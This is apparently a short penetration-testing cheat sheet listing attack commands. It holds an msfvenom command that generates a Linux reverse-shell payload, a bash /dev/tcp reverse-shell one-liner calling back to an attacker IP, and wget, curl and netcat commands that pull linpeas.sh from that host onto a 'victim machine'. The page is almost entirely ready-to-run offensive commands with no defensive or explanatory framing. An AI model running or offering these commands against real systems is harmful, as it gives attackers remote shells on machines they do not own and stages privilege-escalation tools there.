Skip to main content

Miscellaneous

Using MSFVenom to create reverse shell

  1. Using staged payload for reverse_tcp
msfvenom --payload linux/x64/shell/reverse_tcp  LHOST=192.168.45.178 LPORT=80 -f elf -o shell.elf

Reverse Shell Commands

  1. bash
bash -i >& /dev/tcp/192.168.45.178/80 0>&1

Download files in linux

1. Using wget

wget http://192.168.45.178:139/linpeas.sh -O linpeas.sh

2. Using curl

curl --output-dir /tmp/ -O http://192.168.45.178/linpeas.sh 

3. Using netcat

in kali machine

cat linpeas.sh | nc -l -p 1234

in Victim Machine

nc Kali_IP 1234 > linpeas.sh